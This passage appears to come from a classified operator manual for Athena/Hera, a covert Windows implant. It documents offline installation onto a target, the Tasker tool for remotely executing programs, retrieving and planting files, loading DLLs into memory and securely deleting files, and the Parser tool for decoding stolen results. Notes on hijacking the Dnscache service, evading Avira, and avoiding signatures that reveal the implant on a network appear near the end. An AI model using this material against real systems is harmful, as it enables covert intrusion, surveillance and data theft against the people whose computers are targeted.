fdisk 2.20.1 or greater
mawk 1.3.3 or greater
grep 2.16-1 or greater
mount 2.20.1-5 or greater
file 1.5.14 or greater

(S//NF) Begin the Linux based offline installation by booting the target with a Linux boot disk
(i.e. Ubuntu installation media). Insert or download the Athena/Hera media. The Athena/Hera
Media should contain two shell scripts (linux.sh, functions.sh) and an INI configuration file
(usually target.ini). Configuration parameters for the target are pulled from the INI file.
(S//NF) Run ./linux.sh <target.ini>. You will be prompted to select any available target windows
partitions. Select the corresponding number as shown in Figure 15. Once you select the
partition, the Windows architecture will be determined via a file utility call and the appropriate
binaries will be deployed. Once installation is successful, restart the target machine.

Figure 15 - (S//NF) Linux Offline Installation

8. (U) Tasker
(S//NF) Some general usage comments are presented below:
Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion, and
their use on multiple operations without modification may present a signature that could
identify the presence of Athena in a network.

SECRET//NOFORN 25
SECRET//NOFORN
________________________________________________________________________
The word 'overt' in a prompt for configuration information indicates the information will be
visible to a user logged on to the target machine. Care should be taken to ensure these values
are consistent with the operational CONOP.
Configuration settings that can be modified when the implant is on target are indicated in the
prompt text.

8.1 (U) Usage


(S//NF) This section contains information for tasking an implant. Figure 16 (below) shows the
command line options for the Tasker.
Warning
(S//NF) Implant tasking may be completed on the low-side;
however, the operator should be aware that cryptographic key
data will be in the clear.

(S//NF) By default, the Tasker allows the Operator to interactively build tasking for an implant
or implant family. Alternatively, the operator can also input tasking via a scripted tasking file.
>python.exe tasker.py -h
usage: tasker.py [-h] [-r RECEIPT] [-s SCRIPT] [-g GENERATE] [-p PRIORITY]
[-x] [-e] [--id ID] [--debug]

Tasker Configuration

optional arguments:
-h, --help show this help message and exit
-r RECEIPT, --receipt RECEIPT
This argument defines an existing receipt filename to
be used for processing.
-i SCRIPT, --import SCRIPT
This argument provides the ability to import a script
for processing.
-g GENERATE, --generate GENERATE
This argument provides the output path location.
-p PRIORITY, --priority PRIORITY
This argument provides ability to set the
priority/ordering (0..255) NOTE: 128->default and
0->highest.
-x, --persist This argument provides ability to set the batch as a
persistent batch.
-e, --stoponerror This argument provides ability to stop the batch on a
command execution error.
--id ID This argument provides the ability to force a specific
initial task ID for a tasking session (usually just
used for debugging purposes - number is decoded as
hex).
--debug This argument allows debugging information to be
included in the output directory.

Figure 16 - (S//NF) Tasker Command Line Options

8.2 (U) Command Line Options


(S//NF) The Tasker has multiple command line options; however the tool may be invoked
without any command line options. The local directory will be used to output results.

SECRET//NOFORN 26
SECRET//NOFORN
________________________________________________________________________
Usage: python.exe tasker.py

8.2.1 (U) RECEIPT


(S//NF) This argument defines an existing receipt filename to be used for processing. A receipt
file is generated by the Builder and contains all the settings for the configured implant.

8.2.2 (U) SCRIPT


(S//NF) This argument provides the ability to import a script for processing. A script is simply a
text file that contains all the commands in a batch script. The following sections will describe
the syntax for the command script.

8.2.3 (U) GENERATE


(S//NF) This argument provides the output path location. By default, the output will be stored in
the tasker_output directory. This option will override the location for the tasking output
information.

8.2.4 (U) PRIORITY


(S//NF) This argument provides ability to set the priority/ordering (0..255) NOTE:
128->default and 0->highest. Since each beacon will only retrieve a single batch command, this
option allows the user to prioritize the command files to the target.

8.2.5 (U) PERSIST


(S//NF) This argument provides ability to set the batch as a persistent batch. Normally when a
command file is processed on the server, it will be deleted. This option allows SAFETY files to
remain on the server and be processed for every beacon when no data is available for processing.
There is a special SAFETY command to prevent any data written to the disk but providing a
response from the target. If no data is available for a target, the target will not POST a response
to the server. NOTE: these persistent blocks have the responses stored in the SAFTIES
directory.

8.2.6 (U) STOPONERROR


(S//NF) This argument provides ability to stop the batch on a command execution error. Should
a command in the batch fail (e.g. PUT c:\myfile), the remaining batch can be cancelled to
prevent undefined behavior of the batch. By default, STOPONERROR is set to false. With
most commands (e.g. exec net stat), there are no side effects that need to be validated.

8.2.7 (U) ID
(S//NF) This argument provides the ability to force a specific initial task ID for a tasking
session (usually just used for debugging purposes - number is decoded as hex).

8.2.8 (U) DEBUG


(S//NF) This argument allows debugging information to be included in the output directory.

SECRET//NOFORN 27
SECRET//NOFORN
________________________________________________________________________
8.3 (U) User Interface
(S//NF) The Tasker shell interface allows for an interactive processing mode. There are two
input options. By simply selecting a management feature or command feature and pressing
enter, a wizard interface will be presented to select all required options for the feature.
Alternatively, for more advanced users, a command line option with tab-complete can be used to
process commands on a single line. The formatting of the command features is identical to the
script output format.

Management Features
============================================================
receipt generate ls rm import id help

Command Features
============================================================
execute get put memload memunload set delete uninstall

Exit Commands:
============================================================
bye exit

Welcome to the Athena Tasker shell. Type help or ? to list commands.


Figure 17 - (S//NF) Tasker Main Menu

8.3.1 (U) Management Features


(S//NF) The Tasker Management Features provide control of the batch file created to task a
specific implant. The receipt defines the Parent ID of the target to process. Each command set is
known as a batch. Each batch file contains a unique Batch ID.

8.3.1.1 (U) Receipt


(S//NF) This command updates the target reference by loading the receipt.xml file defined for
the target.
Usage: receipt <receipt filename>

Example: receipt builder_output\test_ABCD0064\test_ABCD0064.receipt.xml

Output:
New Receipt Loaded:
Receipt File: builder_output\test_ABCD0064\test_ABCD0064.receipt.xml
Parent ID: test

8.3.1.2 (U) Generate


(S//NF) This command will generate an encrypted batch file ready for deployment on the
Listening Post. This command has additional options:
Priority (number 0..255): 0-highest, 255-lowest priority for the server to process batch
Persist (bool): true-do not delete, false-delete once sent force a file to always be run

SECRET//NOFORN 28
SECRET//NOFORN
________________________________________________________________________
o during a beacon cycle. This has lower priority than other batch commands
o waiting for processing.
Stop On Error (bool): true-do not continue processing batch on command failure
o false-continue processing all batch command irrelevant of error status
Output Path: location where the batch information is stored (default: .\tasker_output)
Usage: generate priority=128 persist=false stoponerror=false output=.\tasker\output
Example: generate
[generate] - output binary batch file for a specific target
Description: prioritize this batch request on LP (0-high, 255-low)
Default: 128
priority (number 0..255):
Description: persist this batch on LP - do not delete after transfer
Default: False
persist (bool):
Description: Stop executing this batch on a command error
Default: False
stoponerror (bool):
Description: specific path to store batch (binary file and script)
Default: tasker_output
output path (string):
PATH: d:\Development\Athena\console\tasker\tasker_output\test
RSA encrypting header with client public key
BINARY: __128_test_ABCD0064_63A95A3C
SCRIPT: __128_test_ABCD0064_63A95A3C_script.txt

BATCH: 63A95A3C
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
1: uninstall pre=0

New Batch ID=0x8E9F251C


Output:
New Receipt Loaded:

SECRET//NOFORN 29
SECRET//NOFORN
________________________________________________________________________
Receipt File: builder_output\test_ABCD0064\test_ABCD0064.receipt.xml
Parent ID: test

8.3.1.3 (U) LS
(S//NF) This command will list the batch id and all commands defined for this batch. They are
numbered from zero and can be referenced by this index.
Usage: ls
Example: ls
Output:
BATCH: DAD72903
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
1: uninstall pre=0

8.3.1.4 (U) RM
(S//NF) This command will remove a command from the current batch. Each command is
reference by a zero based index. These indexes can be viewed by using the LS command as
shown above. The remove command will remove a single command from a batch.
Usage: rm <index>
Example: rm 1
Output:
REMOVED: uninstall pre=0

8.3.1.5 (U) Import


(S//NF) This command will import commands from generated script. Script files are text files
with a .txt extension. This command incorporates external scripts into the current script. The
output will display the command that were imported. Use the LS command to view the complete
list.
Usage: import <filename>
Example: import tasker_output\test\__128_test_ABCD0064_DAD72903_script.txt
Output:
New Script Loaded: tasker\tasker_output\test\__128_test_ABCD0064_DAD72903
_script.txt
COMMAND: uninstall pre=0

8.3.1.6 (U) ID
(S//NF) The ID command is used to force a specific batch ID for the Tasker to generate. This
command is generally used for debug purposes only.
Usage: id <hex>

SECRET//NOFORN 30
SECRET//NOFORN
________________________________________________________________________
Example: id 12345678
Output:
New Batch ID=0x12345678

8.3.1.7 (U) Help


(S//NF) The Help command displays the Tasker Shell Interface Help as shown in Figure 9
(above). Each command has extensive help and can be displayed by request help <command>.
Usage: help <command>

8.3.2 (U) Command Features


(U) NOTE: System environment strings will be expanded at runtime (e.g. %SYSTEMROOT%).

8.3.2.1 (U) Execute


(S//NF) This command will import commands from generated script. Script files are text files
with a .txt extension. This command incorporates external scripts into the current script. The
output will display the commands that were imported. Use the LS command to view the
complete list.
Usage: execute pre=<value> post=<value> filename=<executable> arguments=<string>
Example: execute
[execute] - execute a command on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: amount of time after command processing completes (0-default)
post-delay (number):
Description: 0=foreground(sync) 1=background(async) task (0-default)
task (number 0-foreground, 1-background):
Description: specific application name on target to execute
filename (string):ipconfig
Description: specific arguments used with this command
arguments (string):/all
Output:
COMMAND: execute pre=0 post=0 task=0 filename="ipconfig" arguments="/all"

8.3.2.2 (U) Get


(S//NF) This command will retrieve a file from the target.
Usage: get flag=<number> filename=<string>
Example: get
[get] - download a file from the target
Description: prioritize this get request
flag (bool): (not currently used)
Description: specific file to retrieve
filename (string):c:\temp\myfile.txt

SECRET//NOFORN 31
SECRET//NOFORN
________________________________________________________________________
Output:
COMMAND: get flag=0 filename="c:\temp\myfile.txt"

8.3.2.3 (U) Put


(S//NF) This command will send a file to the target. The local file must be present during the
generate command. The request will also fail if the directory does not exist on the target.

Usage: put remote_filename=<filename> local_filename=<filename>


Example: put
[put] - upload a file to the target
Description: local filename to use
local_filename (string):c:\temp\myfile.txt
Description: remote filename on target
remote_filename (string):c:\windows\system32\a.txt
Output:
COMMAND: put remote_filename="c:\windows\system32\a.txt" local_filename=
"c:\temp\myfile.txt

8.3.2.4 (U) Memload


(S//NF) This command will load a DLL onto the target in the same address space as the target
service. The nickname option can be used to reference this specific DLL for unload.
Warning
(S//NF) The nickname is case sensitive.

Usage: memload pre=0 post=0 nickname=<string> filename=<filename>


Example: memload
[memload] - load a DLL onto the target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: amount of time after command processing completes (0-default)
post-delay (number):
Description: a unique name used for this module
nickname (string):mymodule
Description: specific DLL module to load on target
filename (string):c:\temp\magic.dll
Output:
COMMAND: memload pre=0 post=0 nickname="mymodule" filename="c:\temp\magic.dll"

SECRET//NOFORN 32
SECRET//NOFORN
________________________________________________________________________
8.3.2.5 (U) Memunload
(S//NF) This command will unload a loaded module based on the nickname provided in the
memload command. WARNING: The nickname is case sensitive.
Usage: memunload pre=0 nickname=<string>
Example:
[memunload] - unload a DLL already loaded on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: specific nickname used during memload
nickname (string):mymodule
Output:
COMMAND: memunload pre=0 nickname="mymodule"

8.3.2.6 (U) Set


(S//NF) This command will update a specific configuration option. The following list shows all
the configuration options available via this command.
interval={number} - beacon interval
jitter={percent} - beacon jitter in percentage
bootdelay={number} - amount of time to wait at each boot
hibernationdelay={number} - amount of time to wait after install
taskingdelay={number} - amount of time to wait before tasking
domains={string} - IP or URL of listening post
port={port} - port number of listening post
proxyport={port} - port number of proxy
proxyaddress={ipaddress} - port address of proxy
useragentstring={string} - user agent string sent with command
urlpath={string} - url path for tasking
acceptstring={string} - accept string
acceptlangstring={string} - accept language string
acceptencodingstring={string} - accept encoding string
ieproxyaddress={string} - IE proxy address string
wpadproxyaddress={string} - WPAd proxy address string
statefilepath={string} - state information processing path
batchexecutiontimeout={number} - max amount of time per batch
commandexecutiontimeout={number} - max amount of tie per command
maxchunksize={number} - max amount of bytes to process per send
maxcpuutilization={percent} - max cpu utilization during processing
maxprocessingdatasize={number} - max data size
uninstalldate={date(YYYY-MM-DDTHH:MM:SS)} - time to uninstall
deadmandelay={number} - maximum time to wait for successful beacon
beaconfailures={number} - maximum number of beacons before uninstall
killfilepath={string} - location of kill file
safety={number} - any number - this will perform a no-operation (NOOP)
Usage: set pre=0 post=0 <command>=<value>
Example:
[set] - update a specific configuration setting on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: amount of time after command processing completes (0-default)
post-delay (number):

SECRET//NOFORN 33
SECRET//NOFORN
________________________________________________________________________
Description: specific name of configuration
name:interval
Description: specific value for the configuration
value (number):20000
Output:
COMMAND: set pre=0 post=0 interval=20000

8.3.2.7 (U) Delete


(S//NF) This command will securely delete a file on the target systems.
Usage: delete <filename>
Example:
[delete] - securely delete a file on the target
Description: filename to use
filename (string):c:\temp\magic.dll
Output:
COMMAND: delete filename="c:\temp\magic.dll"

8.3.2.8 (U) Uninstall


(S//NF) This command will uninstall the target from the remote system.
Usage: uninstall
Example: uninstall
[uninstall] - uninstall tool from target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Output:
COMMAND: uninstall pre=0

8.4 (U) User Interface Example


(S//NF) Example: (Athena)
>python.exe tasker.py

Management Features
============================================================
receipt generate ls rm import id help

Command Features
============================================================
execute get put memload memunload set delete uninstall

Exit Commands:
============================================================
bye exit

Welcome to the Tasker shell. Type help or ? to list commands.

SECRET//NOFORN 34
SECRET//NOFORN
________________________________________________________________________
tasker::no receipt>receipt builder_output\e0Eo\receipt.xml
New Receipt Loaded:
Receipt File: builder_output\e0Eo\receipt.xml
Parent ID: e0Eo

tasker::e0Eo>execute
[execute] - execute a command on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: amount of time after command processing completes (0-default)
post-delay (number):
Description: specific application name on target to execute
filename (string):ipconfig
Description: specific arguments used with this command
arguments (string):/all
COMMAND: execute pre=0 post=0 filename="ipconfig" arguments="/all"
Figure 18 - (S//NF) Tasker Shell Interface Example Part 1
OR
>python.exe tasker.py

Management Features
============================================================
receipt generate ls rm import id help

Command Features
============================================================
execute get put memload memunload set delete uninstall

Exit Commands:
============================================================
bye exit

Welcome to the Tasker shell. Type help or ? to list commands.

tasker::e0Eo>execute pre=0 post=0 filename=ipconfig arguments=/all


COMMAND: execute pre=0 post=0 filename="ipconfig" arguments="/all"

tasker::e0Eo>generate
[generate] - output binary batch file for a specific target
Description: prioritize this batch request on LP (0-low, 255-high)
Default: 128
priority (number 0..255):
Description: persist this batch on LP - do not delete after transfer
Default: False
persist (bool):
Description: Stop executing this batch on a command error
Default: False
stoponerror (bool):
Description: specific path to store batch (binary file and script)
Default: tasker_output
output path (string):
PATH: d:\Development\Athena\athena_suite\tasker_output\e0Eo
RSA encrypting header with client public key
BINARY: __128_e0Eo_1111
SCRIPT: __128_e0Eo_1111_script.txt

BATCH: 00001111
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
Figure 19 - (S//NF) Tasker Shell Interface Example Part 2

SECRET//NOFORN 35
SECRET//NOFORN
________________________________________________________________________
8.5 (U) Output
(S//NF) The Tasker produces a binary file (no extension) and a text file (.txt). The binary file
will be copied to the Listening Post for downloading to the target. The text file is an
unencrypted textual reference of the commands within the specific batch file which can be used
as an historical reference or as an input to the Tasker to generate a duplicate batch.

8.5.1 (U) Binary-Based Output File


(S//NF) Sample output: __128_test_ABCD0064_12345678
(S//NF) The binary file is an encrypted block that can only be decrypted by the target. The
Listening Post cannot decode the content of this file. To allow the Listening Post some
knowledge about the files content and priority, the filename is encoded as described below:
Table 9 (U) Command File Encoding
Filename Value Description
Component
Position 0 _ The underbar shows that this is a standard batch file (e.g. __128).

+ The plus sign tells the server that this file is persistent and the server will not delete it after
processing (e.g. +_128).
Priority number This number represents the priority. 0-highest and 255-lowest (NOTE: 128-default)
Parent string This string represents the target parent ID. This name must match the parent ID reference
in the directory.
Child hex This string representation of hex is the target child ID. This name must match the child
ID reference in the directory.
Batch hex This string representation of hex is the batch ID. This is a random number which prevents
duplicate batches.

8.5.2 (U) Text-Based Output File


(S//NF) Sample output: __128_test_ABCD0064_12345678_script.txt
(S//NF) The text file contains the textual representation of the command. This content is stored
in the text file as UTF-8. The file name is the same as the corresponding binary file with the
_script.txt extension.
# ATHENA SCRIPT
execute pre=0 post=0 task=0 filename="ipconfig"
arguments="/all"

9. (U) Parser
(S//NF) Some general usage comments are presented below:
Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion, and
their use on multiple operations without modification may present a signature that could
identify the presence of Athena in a network.

SECRET//NOFORN 36
SECRET//NOFORN
________________________________________________________________________
The word 'overt' in a prompt for configuration information indicates the information will be
visible to a user logged on to the target machine. Care should be taken to ensure these values
are consistent with the operational CONOP.
Configuration settings that can be modified when the implant is on target are indicated in the
prompt text.

9.1 (U) Usage


(S//NF) This section contains information for parsing encrypted data from an implant. Figure 20
shows the command line options for the Parser.
Warning
(S//NF) Implant parsing may be completed on the low-side;
however, the operator should be aware that cryptographic key
data will be in the clear.

(S//NF) By default, the Parser will use the local directory for input and output directory
locations. A single receipt file or directory of receipt files can be included as a command line
option. By default, the builder_output\receipts directory will be used to process receipts built
with the Builder.
Parser Tool
usage: parser.py [-h] [-r RECEIPT] [-i INPUT] [-d] [-o OUTPUT] [-m]

Parser Configuration

optional arguments:
-h, --help show this help message and exit
-r RECEIPT, --receipt RECEIPT
This argument defines an existing receipt filename or
directory of receipts to be used for processing.
-i INPUT, --input INPUT
This argument provides the ability to import a file
or directory of files.
-d, --debug Enable decoding of unencrypted files from target
-o OUTPUT, --output OUTPUT
This argument provides the output path location.
-m, --nomark This argument provides the ability to reuse a
processed directory. By default, the parsing code
will mark processed files with a date prefix. (e.g.
20150908_1010_{30996559-C169-490B-A40B-4ADB597E0D19}.

Figure 20 - (S//NF) Parser Command Line Options

9.2 (U) Command Line Options


9.2.1 (U) RECEIPT
(S//NF) This argument defines an existing receipt filename to be used for processing. This is the
file name with full path to the receipt file generated by the Builder.

SECRET//NOFORN 37
SECRET//NOFORN
________________________________________________________________________
9.2.2 (U) INPUT
(S//NF) This argument provides the ability to import a file or directory of files into the Parser.
By default, the Parser will search the parser_input directory for files that are not marked.

9.2.3 (U) OUTPUT


(S//NF) This argument provides the output path location. By default, the Parser will place the
output results in the parser_output directory.

9.2.4 (U) NOMARK


(S//NF) This argument provides the ability to reuse a processed directory. By default, the parsing
code will mark processed files with a date prefix. (e.g. 20150908_1010_30996559)

9.3 (U) Processing Responses and Safeties


(S//NF) The Parser will process all the output files from the Listening Post. By default, the
Listening Post will store the response file as <parent>_<child>_<date>.
Example: test_ABCD0064_20151221_18_55_28_4091
(S//NF) Once the Parser processes the file, it will preface the filename with the parsing date.
Example: [20151221_18_59_26_6964]_test_ABCD0064_20151221_18_55_28_4091
(S//NF) This strategy will allow processed files to remain in the parser_input directory without
slowing down processing of newly added response files.
Note
(S//NF) To simplify processing, place newly uploaded
responses and safeties in the parser_input directory.

9.4 (U) Output


(S//NF) The Parser produces a text file containing the command and results of each response.

9.4.1 (U) Get


(S//NF) The Get command will also store a file with the same name as the results text file that
contains the content of the file retrieved:
Batch ID = 0x11111111
Command ID = 0x00000000
Command Type = get
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:08:47 2015 GMT
Filename = GET.TXT
Attributes = ARCHIVE

SECRET//NOFORN 38
SECRET//NOFORN
________________________________________________________________________
Modify Time: Mon Dec 21 22:08:02 2015 GMT
Create Time: Mon Dec 21 22:08:02 2015 GMT
File Size: 18 bytes
Output Filename:
d:\Development\Athena\Tests\TestCommandEngine\parser_output\test\ABCD0086\responses\20
151221_17_10_01_0375_get.bin

9.4.2 (U) Put


(S//NF) An example of the Parser output from a successful Put command is shown below:
Batch ID = 0x22222222
Command ID = 0x00000000
Command Type = put
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:08:52 2015 GMT
Filename = d:\Development\Athena\Tests\TestCommandEngine\win32\debug\put.txt

9.4.3 (U) Set


(S//NF) The SET command can return an error for the following reasons. The return code will
be ARESULT_DISK_ERROR(0xA0000104). The parser.py code has been changed to detect
this error code and change the output to DATA NOT PERSISTED. The dynamic data storage
will update the data in memory but will not be available at next reboot.
1) If the implant is running in ram-only mode, the attempt to write to disk will return an
error.
2) If the implant is configured with an invalid dyn_config file, the attempt to write to the
file will return an error.
Output: Error Code = DATA NOT PERSISTED
(S//NF) An example of the Parser output from a successful Set command is shown below:
Batch ID = 0x33333333
Command ID = 0x00000000
Command Type = set
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:08:58 2015 GMT
Set Type = killfilepath
Argument = c:\temp\kill

SECRET//NOFORN 39
SECRET//NOFORN
________________________________________________________________________
9.4.4 (U) Memload
(S//NF) An example of the Parser output from a successful Memload command is shown below:
Batch ID = 0x55555555
Command ID = 0x00000000
Command Type = memload
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:07 2015 GMT
Memory Address = 0x10000000
Nickname = testdll nickname

9.4.5 (U) Memunload


(S//NF) An example of the Parser output from a successful Memunload command is shown
below:
Batch ID = 0x66666666
Command ID = 0x00000000
Command Type = memunload
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:12 2015 GMT
Memory Address = 0x10000000
Nickname = testdll nickname

9.4.6 (U) Delete


(S//NF) An example of the Parser output from a successful Delete command is shown below:
Batch ID = 0x77777777
Command ID = 0x00000000
Command Type = delete
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:17 2015 GMT
Filename = d:\Development\Athena\Tests\TestCommandEngine\win32\debug\deleteme.txt

9.4.7 (U) Execute


(S//NF) An example of the Parser output from a successful Execute command is shown below:

SECRET//NOFORN 40
SECRET//NOFORN
________________________________________________________________________
Batch ID = 0x44444444
Command ID = 0x00000001
Command Type = execute
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:02 2015 GMT
Filename = %systemroot%\system32\net.exe
Process Return Code = 0x00000000
<<STDIN/OUT/ERROR>>
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
Unavailable Z: \\10.3.2.91\Athena Microsoft Windows Network
The command completed successfully.

9.4.8 (U) Uninstall


(S//NF) An example of the Parser output from a successful Uninstall command is shown below:
Batch ID = 0x99999999
Command ID = 0x00000000
Command Type = uninstall
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 23:50:00 2015 GMT

9.5 (S//NF) Error Codes


(S//NF) The implant contains some defined error codes. It is possible to receive
standard windows error codes but most errors are defined at -1(0xFFFFFFFF). The
following table has the defined error codes that can be returned from the implant.
Table 10 - (U) Error Codes
Error Description
0 Success
0xA0000001 Invalid PE Header
0xA0000002 Initialization Failure target DLL
0xA0000003 Teardown Failure target DLL
0xA0000004 Relocation Failure target DLL
0xA0000005 DLL Name Allocation Failure
0xA0000006 Forwarder Entry Allocation Failure
0xA0000007 Forwarder Buffer Overflow
0xA0000008 Duplicate Entry
0xA0000101 Timeout

SECRET//NOFORN 41
SECRET//NOFORN
________________________________________________________________________
0xA0000102 Size too big
0xA0000103 Out of memory
0xA0000104 Disk Error invalid disk name or ram only

10.(U) Notes and Observations


10.1 (U) Installations of Hera Require a Reboot for Elevated Access Privileges
(S//NF) Hera hijacks the Dnscache service on installation. On Windows 7 and 8, this service is
running in a netsvcs instance by default but on Windows 8.1 and Windows 10, this service runs
as NetworkService. The NetworkService user context has reduced security capability on the
system. Due to the srvhost implementation, the service will only run in the netsvcs context after
the next reboot. To account for this deficiency and still provide immediate execution after
installation, the existing service will run as NetworkService (not SYSTEM) until next reboot at
which time the System user netsvcs will be engaged. As a result, until a reboot occurs, some
attempts to access files may fail, causing the command to be reported as an error.

10.2 (U) Installer and RAM_ONLY Versions Should Never Be Run From Disk
(S//NF) Copying the Installer or the RAM_ONLY version of the implant to the target computer
and then executing either application from disk will generate an alert when Avira is the PSP.
Avira flags the size of the data section as being too large and thus possibly malware. Avira does
not flag the size of the implant data section when these applications are run from memory as
intended.

10.3 (U) Builder Does Not Produce a Bit Copy of an Existing Configured
Implant
(S//NF) The Builder can ingest a configuration file from an existing implant and copy the
configuration settings to a new implant. However, the new implant will not be a bit by bit exact
copy of the original implant. Making an exact copy of an existing implant is not possible due to
the design of the implant and the desire to ensure entropy in between instances of the tool. Only
way to reproduce a bit copy of an existing implant would be to have a large section of zero byte
data in the configured implant which would be an easy way to correlate instances of the tool.

10.4 (U) Offline Installer May Report a False Failure on Windows 10


Installations
(S//NF) The Offline Installer may display an error message stating the following key is not
found:
Reg: SYSTEM\CurrentControlSet\Services\SstpSvc
Start -> 0x02
Type -> 0x20
(U) If the result of the installation process is a SUCCESS, the Key Not Found error should be
ignored.

10.5 (S//NF)Timeouts May Occur While Processing Large Files


(S//NF) If the Operator selects a very small chunk size (e.g., 2048 bytes) and a short duration for
either the command execution or batch execution timeout, the implant may not have enough time

SECRET//NOFORN 42
SECRET//NOFORN
________________________________________________________________________
to complete transferring the entire file to the LP before the duration timer expires when the file is
very large. Care should be taken to select values consistent with the operational environment
when configuring the chunk size (maximum number of bytes in a single block), command
execution timeout (terminates processing of long running commands), and batch execution
timeout (terminates processing of long running batches). A good operational practice would be
to assign reasonable values for these settings early in the batch when a large file is being
retrieved.

11. (U) Acronyms / Abbreviations


(U) The acronyms and abbreviations used in this document are shown in Table 11.
Table 11 - (U) Acronyms and Abbreviations
Acronym Description
AXE Athena Executable File
CNE Computer Network Exploitation
CONOP Concept of Operation
DLL Dynamic Link Library
DNS Domain Name Server
GB Gigabyte
KB Kilobyte
KIS Kaspersky Internet Security
LP Listening Post
OS Operating System
PE Portable Executable
PSP Personal Security Product
RAM Random Access Memory
SSL Secure Sockets Layer
UI User Interface
UM User Manual
VM Virtual Machine

SECRET//NOFORN 43

You might also like